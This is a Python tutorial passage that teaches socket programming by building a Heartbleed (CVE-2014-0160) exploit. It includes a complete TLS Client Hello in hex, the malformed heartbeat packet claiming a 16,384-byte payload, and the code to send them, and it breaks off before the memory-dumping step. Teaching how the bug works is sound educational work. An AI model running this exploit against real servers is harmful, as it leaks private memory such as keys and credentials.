Exploiting CVE-2014-0160

CVE-2014-0160, known as the Heartbleed Bug, is a vulnerability in the OpenSSL cryptographic library. The weakness allowed an attacker to steal information that under normal circumstances would be protected by SSL/TLS encryption.

It allowed anyone on the Internet to read the memory of systems protected by vulnerable versions of the OpenSSL software. Basically, it gave an attacker the ability to eavesdrop on data sent directly from the server.

XKCD, for better or worse, has summarised the Heartbleed vulnerability in a web comic:

Are you still there, server? It's me, Margaret

Technically, CVE-2014-0160 was caused by a missing bounds check before a memcpy() call that used non-sanitised user input as the length parameter. This meant that an attacker could send a heartbeat request containing a tiny payload while claiming the payload was up to 64 KB long. OpenSSL trusted the claimed length, copied that many bytes from its own memory into the reply, and sent the reply back to the attacker, leaking the contents of the victim’s memory in chunks of up to 64 KB.
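
To make the missing bounds check concrete, here is a toy model in Python. It is only a sketch and not OpenSSL's code: MEMORY, heartbeat_reply and the check_bounds switch are all made up for illustration, and a slice of a bytes object stands in for the memcpy() call.

```python
# Toy model of the Heartbleed over-read. This is NOT OpenSSL's code.
# MEMORY stands in for the server's heap: the attacker's 3-byte payload
# ("hat") happens to sit right in front of unrelated secret data.
MEMORY = b"hat" + b"|user=admin;password=hunter2|" + b"\x00" * 16


def heartbeat_reply(memory, actual_len, claimed_len, check_bounds):
    """Echo back claimed_len bytes, starting where the payload is stored."""
    if check_bounds and claimed_len > actual_len:
        # The fix: drop requests whose claimed length exceeds the real payload.
        return b""
    # The bug: trust the attacker-supplied length.
    return memory[:claimed_len]


leak = heartbeat_reply(MEMORY, actual_len=3, claimed_len=24, check_bounds=False)
safe = heartbeat_reply(MEMORY, actual_len=3, claimed_len=24, check_bounds=True)
print(leak)
print(safe)
```

Without the check, the reply contains the three bytes we sent plus whatever happened to be stored after them.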

SSL/TLS Handshake Overview

Computers tend to be very proper. When a computer meets a server for the first time, it will very often attempt to shake its hand. Unknown to the human eye this handshake allows the two computers to negotiate the terms of their communication. This can include:

  • The version of the protocol to use

  • The cryptographic algorithm to use

  • Authenticating each other by exchanging and validating digital certificates

  • Using asymmetric encryption techniques to generate a shared secret key that allows the client and server to securely communicate

There are a number of attacks that can, theoretically and practically, be executed if the server is configured with weak SSL/TLS cipher suites or if older protocols are available for use.

This section does not aim to provide you with byte-by-byte coverage of how a handshake occurs, but hopefully gives you a general overview:

Overview of the SSL/TLS handshake
  1. The SSL/TLS client sends a client “hello” message that lists cryptographic information such as the SSL/TLS version and, in the client’s order of preference, the cipher suites supported by the client. The message will also contain a random byte string that is used in following computations. The protocol selected may also allow for the client hello to include information about data compression (if supported).

  2. The SSL/TLS server responds with a server “hello” message that contains the cipher suite chosen by the server from the list provided by the client, the session ID, and another random byte string. The server will also send its digital certificate. If the server requires a digital certificate for client authentication, the server will also send a request that includes the types of certificates supported as well as a list of accepted CAs.

  3. The client verifies the server’s digital certificate.

  4. The client then sends the random byte string that allows the client and the server to compute the secret key to be used for encrypting any following data. The random byte string is encrypted with the server’s public key.

  5. If the server sent a client certificate request, the client sends a random byte string encrypted with the client’s private key along with the client’s digital certificate, or a “no digital certificate” alert. This alert is only a warning; however, with some configurations it can cause the handshake to fail.

  6. The server verifies the client’s provided certificate.

  7. The client sends the server a finished message, which is encrypted with the secret key, indicating that the client part of the handshake is complete.

  8. The server sends the client a finished message, which is encrypted with the secret key, indicating that the server part of the handshake is complete.

  9. For the duration of the SSL/TLS session, the server and client can exchange messages that are symmetrically encrypted with the shared secret key.

The Anatomy of an SSL/TLS Client Hello

Overview of the SSL/TLS Client Hello

The image above is an SSL/TLS Client Hello from my computer to my blog. Using Wireshark, a widely-used network protocol analyser, you can see the request your computer makes and determine what each hexadecimal value is or represents.

You don’t need to understand this diagram to understand how Heartbleed works, but it may help you understand the Client Hello we use later on.

Screenshot of Wireshark
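
If you would like to poke at those fields without Wireshark, here is a small sketch that picks apart the first eleven bytes of the Client Hello we use later in this section. The variable names are my own; the offsets follow the TLS record layout (a five-byte record header followed by a four-byte handshake header).

```python
# First 11 bytes of the Client Hello shown later in this section.
hello_start = bytes.fromhex("16 03 02 00 dc 01 00 00 d8 03 02")

# Record header: content type (1 byte), version (2 bytes), length (2 bytes).
content_type = hello_start[0]
record_version = int.from_bytes(hello_start[1:3], "big")
record_length = int.from_bytes(hello_start[3:5], "big")

# Handshake header: message type (1 byte) and a 3-byte length.
handshake_type = hello_start[5]
handshake_length = int.from_bytes(hello_start[6:9], "big")

# The protocol version requested inside the Client Hello body.
client_version = int.from_bytes(hello_start[9:11], "big")

print(content_type, hex(record_version), record_length)
print(handshake_type, handshake_length, hex(client_version))
```

Here 22 (0x16) marks a handshake record, 1 marks a Client Hello, and 0x0302 is TLSv1.1.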

What is a Port?

Aside from being a town with a harbour or access to navigable water where ships load or unload, a port, when talking about the Internet, is a software or network location where information is sent. For example, SSL/TLS is often on TCP port 443 while unencrypted HTTP traffic is often on TCP port 80.

Port numbers are 16-bit values, so there are 65,535 usable ports for TCP (1 to 65535, with port 0 reserved) and an additional 65,535 ports for UDP, meaning any one server has a total of 131,070 ports. Keep in mind that some of these ports are assigned to specific applications or protocols: those between 0 and 1023 are often referred to as “well-known” or “reserved” ports and are allocated by IANA.

List of Well-Known and Reserved Ports

If you cannot recognise any of these ports that’s 100% fine! You just learnt a bunch of new ones!

List of common ports

A Recipe for Broken Hearts

Concepts Covered

  • Using the socket library

  • Using the ssl library

  • SSL/TLS

  • Using named parameters

  • Using Control Flow Tools

  • Endians

  • Understanding and using RFCs

  • Encoding and Decoding Network Protocols

  • Networking Basics

  • Basic Data Types

  • Logic Flows

Ingredients

  • One python file called main.py or yourprojectname.py

  • One dash of argparse, a Python “built-in” meaning you don’t need to install anything

  • One cup of sweet ASCII font from

  • One helping of TLS “hello” handshake

  • A handful of TLS “heartbeats”

  • A liberal helping of Python sockets

Method

Like we discussed when we were building the subdomain bruteforcer, the first step is to create a command center, or a way for your user to interact with your tools. For this tool we need two initial arguments:

  • an option to provide a domain name

  • an option to provide a port
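
As a starting point, the two arguments could be sketched with argparse like this. The names build_parser, host and --port are my own choices (picked so that args.host and args.port line up with the code further down), and the default of 443 is an assumption.

```python
import argparse


def build_parser():
    """Build the command line interface for the tool (hypothetical layout)."""
    parser = argparse.ArgumentParser(
        description="Check a host for CVE-2014-0160 (Heartbleed)"
    )
    parser.add_argument("host", help="domain name or IP address to test")
    parser.add_argument(
        "-p", "--port", type=int, default=443,
        help="TCP port to connect to (default: 443)",
    )
    return parser


# Passing a list lets us try the parser without touching sys.argv.
args = build_parser().parse_args(["example.com", "--port", "8443"])
print(args.host, args.port)
```

In the real tool you would call parse_args() with no arguments so that it reads the command line.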

Once we know the host and port we want to connect to, we will use the socket library, a low-level networking interface.

You may be thinking we will be using the requests library as we did previously. This is not the case, as requests speaks HTTP, an application-level protocol for distributed, collaborative, hypermedia information (like websites). HTTP is stateless, generic and, for the most part, multi-purpose.

A socket, on the other hand, is one end of a two-way communication link between two applications on a network. It is bound to a port number so that TCP can identify the application the data should be sent to.

In the OSI model (shown below) HTTP falls into the application layer, while sockets are within the transport layer.

Open Systems Interconnection model

We won’t be getting too much into the socket library because it is quite a deep and complex rabbit-warren. However, more resources are provided under Further Reading.

For now we will create a new socket under our command line option, specifying we want to communicate with IPv4 (socket.AF_INET) using TCP (socket.SOCK_STREAM).

socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

Hint

It is often easier to add logging and documentation as you go rather than having to come back to it at a later stage.

Using our newly created socket socks, we want to connect to the host and port the user specified. The socket.connect() function accepts a tuple, a data-structure we haven’t really covered yet.

Warning

You might be thinking “Calling the variable socks instead of socket is silly!” and I would tend to agree with you. However, with great programming power comes great responsibility, and that responsibility is ensuring you don’t “shadow” existing names, i.e. name variables after built-ins or, in this case, the socket module we imported. This can lead to side effects and issues later when your code tries to use the actual socket module and finds a variable called socket instead.

So, what are tuples? Tuples (pronounced like “toople” or “tupple”) are collections or sequences similar to lists. The difference is that tuples cannot be changed (they are immutable). The other distinction is that tuples are surrounded by parentheses (()), rather than (square) brackets ([]).

Note

To write a tuple containing a single value you have to include a trailing comma, even though there is only one value:

my_tuple = (50, )
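
A quick sketch of those tuple rules, using a made-up address tuple:

```python
address = ("example.com", 443)

# Tuples can be unpacked and indexed just like lists...
host, port = address

# ...but they cannot be modified once created.
try:
    address[1] = 8443
except TypeError as error:
    outcome = f"tuples are immutable: {error}"

single = (50,)      # a tuple containing one value
not_a_tuple = (50)  # just the integer 50 wrapped in parentheses

print(outcome)
print(type(single).__name__, type(not_a_tuple).__name__)
```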

To pass the hostname and port we are attacking to the socket object we would write:

socks.connect((args.host, args.port))
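
Putting the socket creation and the connect call together might look something like the sketch below. The connect() helper and its five second timeout are my own additions rather than something the tool requires; the timeout simply stops the program hanging forever on an unresponsive host.

```python
import socket


def connect(host, port, timeout=5.0):
    """Open a TCP connection over IPv4 and return the connected socket."""
    socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    socks.settimeout(timeout)
    try:
        # connect() takes ONE argument: a (host, port) tuple.
        socks.connect((host, port))
    except OSError:
        # Clean up the socket before letting the caller see the error.
        socks.close()
        raise
    return socks
```

You would call it as socks = connect(args.host, args.port) and wrap that call in a try/except OSError block if you want to log a friendly message when the connection fails.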

As mentioned previously, computers are very formal and like to follow “social norms” so now that we have established a connection to the server, we need to say “hello” and basically negotiate with our server how we are going to securely communicate.

This can be done with the following SSL/TLS Client Hello:

16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01

This can be included as a “global” variable (a variable that can be accessed anywhere in your application) by adding it to the top of your file, or you can choose to read it in from a file.

To add a “global” variable:

#!/usr/bin/python

import argparse
import socket
# other imports

# globals declared
HELLO = "hello there"

Warning

Using globals and the global statement is considered a programming “anti-pattern” as they can be accessed at the same time by different functions which can frequently result in bugs.

Global variables can also make code difficult to read as very often you need to search through multiple functions to understand all the different locations that global variables are used and modified.

Hint

If you are using a global variable you may notice you have a small problem: Python strings using talking-marks (" or ') don’t span multiple lines. You may have solved this problem by making a really long string, or by concatenating several strings. We can avoid this problem using what is referred to as a triple-quoted string literal, using either """ or ''' as shown in the example below:

#!/usr/bin/python

import argparse
import socket
# other imports

# globals declared
HELLO = """16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf"""

Once we have the hello loaded into our application, either by reading a file or by using a global variable, we will need to convert the string into bytes. While this may seem like a simple enough task, keep in mind the value we have is not a true hexadecimal (base-16) value, but rather a string representation of it, so before we can convert it, we need to process that string.

You will want to write a function that does several things:

  • Remove all the spaces in the original string

  • Remove all the \n characters

  • Decode the hexadecimal to bytes

Using what we learnt in the “Handling Word Lists” section, I will leave the first two points up to you. Decoding the hexadecimal to bytes is a straightforward process once you know what you are trying to do. For this we are going to use the built-in bytes.fromhex():

return bytes.fromhex(hello_payload)

In the example above we are converting our hello_payload from hexadecimal to bytes.
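
If you get stuck, one possible shape for the whole function is sketched below. This is just one way of doing it: the name hex2byte matches what I call my function later on, while hex_string and cleaned are placeholder names. Recent Python versions also let bytes.fromhex() skip whitespace by itself, but stripping it explicitly keeps the three steps visible.

```python
def hex2byte(hex_string):
    """Convert a spaced, multi-line hex dump into a bytes object."""
    # Steps 1 and 2: remove the spaces and the newline characters.
    cleaned = hex_string.replace(" ", "").replace("\n", "")
    # Step 3: decode the remaining hexadecimal digits to bytes.
    return bytes.fromhex(cleaned)


sample = hex2byte("""16 03 02 00  dc 01 00 00
d8 03 02 53""")
print(sample)
```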

Bytes have come up a couple of times now, and you are probably thinking: what the heck is a byte, or in Python a Byte Object? To put it simply, a Byte Object is a sequence of bytes (clear, right?) while Strings (str) are a sequence of characters. This makes a Byte Object a machine-readable form, whereas Strings are human-readable. Furthermore, this allows Byte Objects to be stored directly to disk, while a String needs to be encoded into a Byte Object first.
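
A tiny sketch of the difference, using a made-up string:

```python
text = "hello"                # str: a sequence of characters
raw = text.encode("ascii")    # bytes: a sequence of integers from 0 to 255

print(raw)                    # printed with a leading b
print(list(raw))              # the underlying numbers
print(raw.decode("ascii"))    # and back to a str again
```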

If you were to print the output of the SSL/TLS Client Hello you would get something like:

SC[r  +H9
w3f
32ED/A      I  #

Now that we have a converter for hex to bytes, we want to pass our client hello through this function before assigning it to the hello variable. This can be done as follows:

# hex2byte is what I called my function to convert hex to bytes

hello = hex2byte('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

Now that we have our Client Hello in a computer-readable format, we can send the hello to the server using the send() method:

socks.send(hello)

The send() method will only work if we were able to successfully connect the socket in the previous step. It returns the number of bytes sent.
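
To see that return value without needing a real server, here is a sketch that uses socket.socketpair() to create two already-connected sockets on the local machine. The left and right names are placeholders of my own.

```python
import socket

# Two connected sockets on this machine: what one sends, the other receives.
left, right = socket.socketpair()

message = bytes.fromhex("16 03 02 00 dc")
sent = left.send(message)      # returns how many bytes were accepted
received = right.recv(sent)

left.close()
right.close()
print(sent, received)
```

For large messages send() may accept only part of the data; socket.sendall() keeps going until everything has been sent or an error occurs.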

Now that we have sent the Client Hello, we need to monitor the response from the server we are communicating with. A simple way of doing this is using while True. This allows us to continue polling for a response to our Client Hello, as responses can be slow or incomplete on the first attempt to receive them.

At this point the data, or bytes, returned from the server are sitting in the network buffer in the operating system’s queue, waiting to be processed. To process them we can use socket.recv(), which as the name suggests allows us to receive that data from the queue.

The recv() function takes two arguments: first the maximum number of bytes to return from the queue, and second an optional set of flags.

Note

The flags available for use with recv() aren’t critical for you to know right now. If you are curious, you can find more information in the manual (man) page for the UNIX recv(2) system call, which on OS X and UNIX can be accessed by using man recv. Alternatively, you can browse man page entries at man7.org.

We could just ask the socket to return the full size of the packet, however we only need the first five bytes to return the content type, version, and length:

while True:
    handshake_response = socks.recv(5)

Unfortunately, our handshake_response is not in a human readable format:

>>> print(handshake_response)
b'\x15\x03\x02\x00\x02'

We will need to unpack the response so it is usable. We can do this using the struct.unpack() function. struct.unpack() takes two arguments: a format and a buffer. The buffer in this case would be our handshake_response.

There are several formats, and therefore format characters, you can pick from when packing and unpacking data. These are listed below; however, we will be focusing on two specific ones: B (unsigned char) and H (unsigned short).

Format  C Type              Python type        Standard size
x       pad byte            no value
c       char                bytes of length 1  1
b       signed char         integer            1
B       unsigned char       integer            1
?       _Bool               bool               1
h       short               integer            2
H       unsigned short      integer            2
i       int                 integer            4
I       unsigned int        integer            4
l       long                integer            4
L       unsigned long       integer            4
q       long long           integer            8
Q       unsigned long long  integer            8
n       ssize_t             integer
N       size_t              integer
e       binary16            float              2
f       float               float              4
d       double              float              8
s       char[]              bytes
p       char[]              bytes
P       void *              integer
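
You don’t have to take the “Standard size” column on faith. As a quick sketch, struct.calcsize() reports how many bytes a format string describes (the > prefix, covered shortly, asks for standard sizes):

```python
import struct

# Standard sizes of a few format characters from the table.
sizes = {code: struct.calcsize(">" + code) for code in "BHIQ"}

# One unsigned char followed by two unsigned shorts.
header_size = struct.calcsize(">BHH")

print(sizes)
print(header_size)
```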

Because we are unpacking data, we also need to be aware of the data’s endianness. Endianness is the sequential order in which bytes are arranged when stored in memory or when transmitted over digital links. In computing, there are two competing representations: big-endian and little-endian.

A good analogy I found on Stack Overflow explained endianness like this:

Consider the way I communicate with you. My native language might be Spanish and who knows what goes on in my brain. Internally, I might represent the number three as “tres” or some weird pattern of neurons. Who knows? But when I communicate with you, I must represent the number three as “3” or “three” because that’s the protocol you and I have agreed to, the English language. So unless I’m a terrible English speaker, how I internally store the number three won’t affect my communication with you.

This is the same way you should look at what we are doing with endians now: we are receiving that information and meaningfully storing it within our brain!

Little Endian

Diagram of how a 32-bit integer is arranged in memory when stored from a register on a little-endian computer system.

Big Endian

Diagram of how a 32-bit integer is arranged in memory when stored from a register on a big-endian computer system.

Of course there is more to endianness than just “lol its things in different orders” however, for now all you need to know is: 1. endianness is important and 2. when unpacking the data from the server, we want to use big-endian.

When specifying the byte order, size, or alignment in Python there are a number of characters we can use. By default, the representation is done in the machine’s native format and byte order. This is sometimes undesirable, so the first character of our format string can be used to indicate the byte order, size and alignment of the packed data.

Format  Byte Order
@       native
=       native
<       little-endian
>       big-endian
!       network (= big-endian)
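
To see why the prefix matters, here is a short sketch that unpacks the same two bytes with different byte orders. The bytes 03 02 are the version field we will meet in the server’s reply.

```python
import struct

raw = b"\x03\x02"

big = struct.unpack(">H", raw)[0]      # read as 0x0302
little = struct.unpack("<H", raw)[0]   # read as 0x0203
network = struct.unpack("!H", raw)[0]  # network order is big-endian

print(hex(big), hex(little), hex(network))
```

Only the big-endian reading gives us 0x0302, the value TLS actually means.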

So, when we unpack the handshake_response we need to know what we are unpacking so that we can specify what each type is. Every SSL/TLS record, including the server’s reply to our hello, begins with a five-byte header: a content type (1 byte), a protocol version (2 bytes) and a length (2 bytes). In C these would be an unsigned char and two unsigned shorts, all of which are represented as ints in Python. This would make our unpack format >BHH.

Our full command would look something like:

>>> (content_type, version, length) = struct.unpack('>BHH', handshake_response)
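
Here is the same call as a small runnable sketch, fed with the five bytes printed earlier. It also shows what happens if the buffer is the wrong size, which is worth handling in your tool; the too_short flag is just my own way of recording that.

```python
import struct

handshake_response = b"\x15\x03\x02\x00\x02"

# One unsigned char and two unsigned shorts, all big-endian.
content_type, version, length = struct.unpack(">BHH", handshake_response)
print(content_type, hex(version), length)

# unpack() insists on exactly five bytes for this format.
try:
    struct.unpack(">BHH", handshake_response[:3])
except struct.error:
    too_short = True
```

For these particular bytes the content type is 21 (0x15), which the cross-reference tables further down list as an alert rather than a handshake.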

Previously we used recv() to fetch a fixed number of bytes from the network buffer in the operating system’s queue. Now we want to fetch the rest of the record, which is length bytes long, and a single recv() call may return fewer bytes than we ask for. Python sockets have sendall() but no matching recvall(), although a number of people have tried to add one in the past. So we are going to create our own!

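def recvall(sock, count):
    """Read exactly count bytes from sock, or return None if it closes early."""
    buf = b''
    while count:
        new_buffer = sock.recv(count)
        if not new_buffer:
            # An empty read means the other side closed the connection.
            return None
        buf += new_buffer
        count -= len(new_buffer)
    return buf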

The TCP stream affords us some luxury in that we know the bytes of data will not arrive out of order and will be delivered no more than once. However, we don’t know how the data will be split up: will it arrive as four 10-byte chunks or all at once? To solve this, we can use a while loop.

The way this implementation works is that, based on the length (passed in via count), it keeps retrieving data from the socket until count reaches zero or the connection is closed. While this is not the most elegant way of writing a recvall function, it works for our purposes.
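
If you want to convince yourself the loop behaves, here is a sketch that exercises it locally. socket.socketpair() gives us two connected sockets, so one end can play the server; the writer and reader names are my own.

```python
import socket


def recvall(sock, count):
    """Read exactly count bytes from sock, or return None if it closes early."""
    buf = b""
    while count:
        new_buffer = sock.recv(count)
        if not new_buffer:
            return None
        buf += new_buffer
        count -= len(new_buffer)
    return buf


writer, reader = socket.socketpair()

# The data is written in two pieces but read back as one.
writer.sendall(b"hello")
writer.sendall(b"world")
whole = recvall(reader, 10)

# Once the writer closes, there is nothing left to read.
writer.close()
after_close = recvall(reader, 1)
reader.close()
print(whole, after_close)
```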

Now that we have a function that allows us to retrieve the remaining information in the buffer, we can put this to good use fetching the remaining parts of the handshake from the network buffer:

hand = recvall(socks, length)

To help with understanding what is going on, now is as good a time as any to add a print statement or logging entry to print the content type, version, and length. If you want to provide more verbose information, such as what each value means, we have included a number of helpful cross-references below:

Record Type

Type                Decimal  Hexadecimal
Change Cipher Spec  20       0x14
Alert               21       0x15
Handshake           22       0x16
Application Data    23       0x17
Heartbeat           24       0x18

Handshake Records

Type                 Decimal  Hexadecimal
Hello Request        0        0x00
Client Hello         1        0x01
Server Hello         2        0x02
Certificate          11       0x0B
Server Key Exchange  12       0x0C
Certificate Request  13       0x0D
Server Hello Done    14       0x0E
Certificate Verify   15       0x0F
Client Key Exchange  16       0x10
Finished             20       0x14

SSL/TLS Version

Type     Hexadecimal
SSLv2    0x0002
SSLv3    0x0300
TLSv1.0  0x0301
TLSv1.1  0x0302
TLSv1.2  0x0303
TLSv1.3  0x0304
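
One way to use these cross-references in your logging is to turn them into dictionaries. The sketch below is only a suggestion: RECORD_TYPES, VERSIONS and describe_record are names I made up, and the output format is arbitrary.

```python
RECORD_TYPES = {
    20: "Change Cipher Spec",
    21: "Alert",
    22: "Handshake",
    23: "Application Data",
    24: "Heartbeat",
}

VERSIONS = {
    0x0300: "SSLv3",
    0x0301: "TLSv1.0",
    0x0302: "TLSv1.1",
    0x0303: "TLSv1.2",
    0x0304: "TLSv1.3",
}


def describe_record(content_type, version, length):
    """Return a human-readable summary of a record header."""
    type_name = RECORD_TYPES.get(content_type, "Unknown")
    version_name = VERSIONS.get(version, "Unknown")
    return (
        f"type={type_name} ({content_type}) "
        f"version={version_name} (0x{version:04x}) length={length}"
    )


print(describe_record(22, 0x0302, 220))
```

Using dict.get() with a default means an unexpected value produces “Unknown” instead of a KeyError.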

Now we need to inspect the content type we received from the server. Specifically, we want to make sure our content type is a handshake, and that the first byte of the handshake we got from our recvall function is 0x0E, or Server Hello Done.

The first step we need to take is getting the first byte from the handshake returned by recvall and finding a way to convert it to a hexadecimal value. It sounds complicated, but Python has made this a relatively painless process using the hex() function, which returns a lowercase string such as '0xe'.

But how do we get the first byte of the handshake? Bytes objects in Python can be accessed like lists, meaning that if we want the first element we can simply use mybytes[0]. In Python 3 this gives us an integer between 0 and 255. It means that we can access any byte if we know the index. Therefore, we can write something like:

record_type = hand[0]
record_ordinal = hex(record_type)

To put it more succinctly:

record_ordinal = hex(hand[0])

Now that we have the ordinal of the first byte, we can check that our content type and record type match what we need to continue with exploiting Heartbleed.

There are several ways we can test multiple conditions. While some people may choose to nest if statements, a more compact way is using a logical operator.

Operator     Description                                           Example
Logical and  True only if both a and b are True or non-zero        a = 10, b = 20: a and b returns 20, which counts as True
Logical or   True if either of the two is True or non-zero         a = False, b = True: a or b returns True
Logical not  Reverses the logical state of the value that follows  a = 10, b = 20: not a and b returns False
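
The examples from the table can be checked directly. One detail worth knowing is that and and or hand back one of their operands rather than always returning True or False:

```python
a, b = 10, 20

both = a and b           # a is truthy, so the result is b
either = False or True   # the first operand is falsy, so the result is True
negated = not a and b    # evaluated as (not a) and b

print(both, either, negated)
```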

Keeping our logical operators in mind, we are looking for two conditions to be True at the same time: content_type == 22 and our record_ordinal equals '0xe', the string that hex() returns for 0x0E:

record_ordinal = hex(hand[0])
if content_type == 22 and record_ordinal == '0xe':

For a more compact version, we can directly test the result of hex(hand[0]):

if content_type == 22 and hex(hand[0]) == '0xe':

Warning

One thing that often still catches me off guard is letter case. hex() returns a lowercase string with no leading zero, so 0x0E comes back as '0xe' rather than '0x0E'. It is important to check what the function returns and to normalise it to ensure validation works as expected.
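
A short sketch of the trap, using a made-up four byte handshake body:

```python
hand = b"\x0e\x00\x00\x00"

first_byte = hand[0]         # an int: 14
as_text = hex(first_byte)    # a str: '0xe'

print(as_text == 0x0E)       # a str never equals an int
print(as_text == "0x0E")     # wrong case and an extra zero
print(as_text == "0xe")      # matches what hex() produces
print(first_byte == 0x0E)    # comparing the integer avoids the issue
```

If you would rather not think about case at all, comparing the integer hand[0] with 0x0E directly is an alternative to going through hex().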

Now that we know the handshake is complete, we can move onto exploiting the server, so we want to break the while True loop.

The break statement allows you to break out of the innermost enclosing for or while loop. Loops can also have an else clause, which runs when the loop finishes because the list is exhausted (or the while condition becomes false) rather than because you specifically used break.

for animal in animals:
    if animal == "duck":
        break

continue, on the other hand, skips to the next iteration of the loop, which can be helpful if you are looking for particular qualities, for example even and odd numbers.

for animal in animals:
    if animal == "duck":
        print("Quack Quack! We found the duck!")
        break
    elif animal == "llama":
        print("*llama noises* We found the llama!")
        continue
    else:
        print(f"Unknown animal: {animal}")

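Another important flow control statement is the pass statement, which does nothing. It can be used when a statement is syntactically required but no action should be taken, for example as a place-holder for function or conditional bodies that have not yet been populated.

Returning to the else clause on loops: in the following example the final else belongs to the for loop, so it only runs if the loop finishes without hitting break: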

for animal in animals:
    if animal == "duck":
        print("Quack Quack! We found the duck!")
        break
    elif animal == "llama":
        print("*llama noises* We found the llama!")
        continue
else:
    print("What sort of farm is this? A duck and llama farm!")
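
The pass statement described above hasn’t had an example of its own yet, so here is a small sketch. The animals list and the sounds list are made up for illustration.

```python
animals = ["duck", "llama", "goose"]
sounds = []

for animal in animals:
    if animal == "duck":
        sounds.append("quack")
    elif animal == "llama":
        # Nothing to do yet, but the elif still needs a body.
        pass
    else:
        sounds.append(f"unknown animal: {animal}")

print(sounds)
```

Unlike continue, pass does not skip anything: execution simply carries on with whatever comes next.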

You should now have something like:

if content_type == 22 and hex(hand[0]) == '0xe':
    break
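
Pulling the pieces together, the whole receive loop could be sketched as a function like the one below. Treat it as one possible arrangement rather than the answer: wait_for_server_hello_done is a name I invented, it returns True or False instead of using break, and it compares the integer hand[0] directly instead of going through hex().

```python
import socket
import struct


def recvall(sock, count):
    """Read exactly count bytes from sock, or return None if it closes early."""
    buf = b""
    while count:
        new_buffer = sock.recv(count)
        if not new_buffer:
            return None
        buf += new_buffer
        count -= len(new_buffer)
    return buf


def wait_for_server_hello_done(sock):
    """Read records until Server Hello Done arrives or the connection ends."""
    while True:
        header = recvall(sock, 5)
        if header is None:
            return False
        content_type, version, length = struct.unpack(">BHH", header)
        hand = recvall(sock, length)
        if not hand:
            # Connection closed mid-record, or an empty record body.
            return False
        if content_type == 22 and hand[0] == 0x0E:
            return True
```

Calling recvall(sock, 5) for the header, rather than a bare recv(5), protects against the header itself arriving in more than one piece.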

You will now want to include a heartbeat packet in the same way you included the original hello message, either with a file or a global variable you can use.

A heartbeat packet looks like:

18 03 02 00 03
01 40 00

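Value  Description
18     Indicates a heartbeat record
03 02  The SSL/TLS version
00 03  Length of the record body that follows (3 bytes)
01     Heartbeat request
40 00  Claimed payload length: 0x4000 is 16,384 bytes (2^14, the size limit RFC 6520 places on a heartbeat message), even though no payload follows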
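
If you prefer to build the packet from its fields rather than copy the hex, the table maps neatly onto struct.pack(). This is just a sketch; the heartbeat variable name is my own.

```python
import struct

heartbeat = struct.pack(
    ">BHHBH",
    0x18,    # content type: heartbeat record
    0x0302,  # SSL/TLS version
    3,       # length of the record body that follows
    0x01,    # heartbeat message type: request
    0x4000,  # claimed payload length (16,384), with no payload attached
)

print(heartbeat.hex())
```

The mismatch between the last two fields is the whole trick: the record body is three bytes long, yet it claims to carry a 16,384 byte payload.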

So now is where we begin to write the code that will actively exploit Heartbleed. Start by creating a new function that takes the socket you previously created.

Inside that function, use the socket we pass in to send the heartbeat payload we just created. This can be done in the same way that we sent the original Client Hello, using the socks.send() function.

You might get a bit of deja vu from the next part, as we use socks.recv(5) to pull the first five bytes from the network buffer. The difference is that before we unpack the content (in the same way we did last time) we check that we actually received something: recv() returns an empty bytes object (b'') when the server has closed the connection, and our recvall() returns None in that case. If nothing came back, you should add some logging at the appropriate level to let the user know and either terminate the application or, if you are extending it to add support for multiple domains and ports, return and move on to the next combination.

If we did receive a header, we can move on to unpacking the contents, in the exact same way we did before!

From here we will be doing several relatively simple checks against the contents we received as well as other information provided by the server. Using the knowledge of content types and sockets, you will want to write code that accomplishes the following:

  • Check that the response header is not None (or empty) and, if it is, handle either returning or terminating

  • Retrieve the remaining content from the network buffer using the recvall() function and check that the content does not equal None

  • Check whether the content type is that of a heartbeat and, if it is, dump the contents (dumping the contents is covered in the next section so use the appropriate flow control call to handle this)

  • Check whether the content type is that of an alert and, if it is, dump the contents (dumping the contents is covered in the next section so use the appropriate flow control call to handle this)

  • Check the length of the response returned against the length specified in our heartbeat call (hexadecimal: 00 03). A response longer than that means the server sent back more data than we gave it.
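
To give you something to compare your own attempt against, here is one way those checks could hang together. It is a sketch under my own assumptions: check_heartbeat and the status strings are invented, it returns the payload instead of dumping it, and it uses recvall() for the header so that None is the only “nothing came back” case.

```python
import socket
import struct

HEARTBEAT = bytes.fromhex("18 03 02 00 03 01 40 00")


def recvall(sock, count):
    """Read exactly count bytes from sock, or return None if it closes early."""
    buf = b""
    while count:
        new_buffer = sock.recv(count)
        if not new_buffer:
            return None
        buf += new_buffer
        count -= len(new_buffer)
    return buf
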